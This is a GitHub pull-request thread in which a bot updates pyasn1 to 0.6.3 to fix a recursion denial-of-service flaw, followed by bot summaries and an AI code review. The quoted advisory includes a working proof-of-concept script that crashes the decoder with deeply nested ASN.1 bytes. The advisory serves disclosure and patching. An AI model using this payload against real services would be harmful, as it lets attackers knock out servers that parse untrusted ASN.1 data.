chore(deps): update dependency pyasn1 to v0.6.3 [security]

[renovate-bot]

This PR contains the following updates:

Package	Change	Age	Confidence
pyasn1 (changelog)	==0.6.1 → ==0.6.3

GitHub Vulnerability Alerts

CVE-2026-30922

Summary

The pyasn1 library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.

This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (MAX_OID_ARC_CONTINUATION_OCTETS) does not mitigate this recursion issue.

Details

The vulnerability exists because the decoder iterates through the input stream and recursively calls decodeFun (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.
Vulnerable Code Locations:

1. indefLenValueDecoder (Line 998):
   for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):
   This method handles indefinite-length constructed types. It sits inside a while True loop and recursively calls the decoder for every nested tag.

2. valueDecoder (Lines 786 and 907):
   for component in decodeFun(substrate, componentType, **options):
   This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of SEQUENCE or SET types. Line 907: Recursively decodes elements of SEQUENCE OF or SET OF types.

3. _decodeComponentsSchemaless (Line 661):
   for component in decodeFun(substrate, **options):
   This method handles decoding when no schema is provided.

In all three cases, decodeFun is invoked without passing a depth parameter or checking against a global MAX_ASN1_NESTING limit.

PoC

import sys
from pyasn1.codec.ber import decoder

sys.setrecursionlimit(100000)

print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
chunk = b'\x30\x80' 
payload = chunk * depth

print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
print("[*] Triggering Decoder...")

try:
    decoder.decode(payload)
except RecursionError:
    print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
    print("[!] Crashed: Out of Memory")
except Exception as e:
    print(f"[!] Crashed: {e}")

[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit

Impact

• This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
• Service Crash: Any service using pyasn1 to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.
• Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.

Credits

Vulnerability discovered by Kevin Tu of TMIR at ByteDance.

---

Release Notes

pyasn1/pyasn1 (pyasn1)

v0.6.3

Compare Source

• CVE-2026-30922 (GHSA-jr27-m4p2-rc6r): Added nesting depth
  limit to ASN.1 decoder to prevent stack overflow from deeply
  nested structures (thanks for reporting, romanticpragmatism)
• Fixed OverflowError from oversized BER length field
  issue #​54
  pr #​100
• Fixed DeprecationWarning stacklevel for deprecated attributes
  issue #​86
  pr #​101
• Fixed asDateTime incorrect fractional seconds parsing
  issue #​81
  pr #​102

v0.6.2

Compare Source

• CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits
  in OID/RELATIVE-OID decoder (thanks to tsigouris007)
• Added support for Python 3.14
  pr #​97
• Added SECURITY.md policy
• Fixed unit tests failing due to missing code
  issue #​91
  pr #​92
• Migrated to pyproject.toml packaging
  pr #​90

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[gemini-code-assist]

Summary of Changes

Hello, I'm Gemini Code Assist¹! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request performs a critical dependency update for pyasn1 to version 0.6.3. This update is essential for patching a significant Denial of Service vulnerability (CVE-2026-30922) that could lead to application instability or resource exhaustion when processing specific types of ASN.1 data. The change ensures the project utilizes a more secure version of the library.

Highlights

• Dependency Update: Updated the pyasn1 dependency from version 0.6.1 to 0.6.3.
• Security Fix: Addressed CVE-2026-30922, a Denial of Service (DoS) vulnerability in pyasn1 caused by uncontrolled recursion when decoding deeply nested ASN.1 data.
• Vulnerability Impact: Mitigated the risk of service crashes or resource exhaustion due to crafted payloads exploiting the recursion vulnerability.

Changelog

• packages/sqlalchemy-spanner/requirements.txt
  • Updated pyasn1 dependency from 0.6.1 to 0.6.3.
  • Updated the SHA256 hashes for the pyasn1 package to reflect the new version.

Activity

• The pull request was automatically generated by Renovate Bot to update the pyasn1 dependency.
• Automerge is currently disabled, requiring a manual merge once approved.
• The PR is configured to rebase automatically if conflicts arise or if the rebase/retry checkbox is ticked.

Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature	Command	Description
Code Review	/gemini review	Performs a code review for the current pull request in its current state.
Pull Request Summary	/gemini summary	Provides a summary of the current pull request in its current state.
Comment	@gemini-code-assist	Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help	/gemini help	Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for GitHub and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Footnotes

1. Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution. ↩

[gemini-code-assist]

Code Review

This pull request updates the pyasn1 dependency from version 0.6.1 to 0.6.3 in packages/sqlalchemy-spanner/requirements.txt. This is a security update to address CVE-2026-30922, a Denial of Service vulnerability. The version update and corresponding hash changes are correct and effectively mitigate the security risk. No issues were found with this change.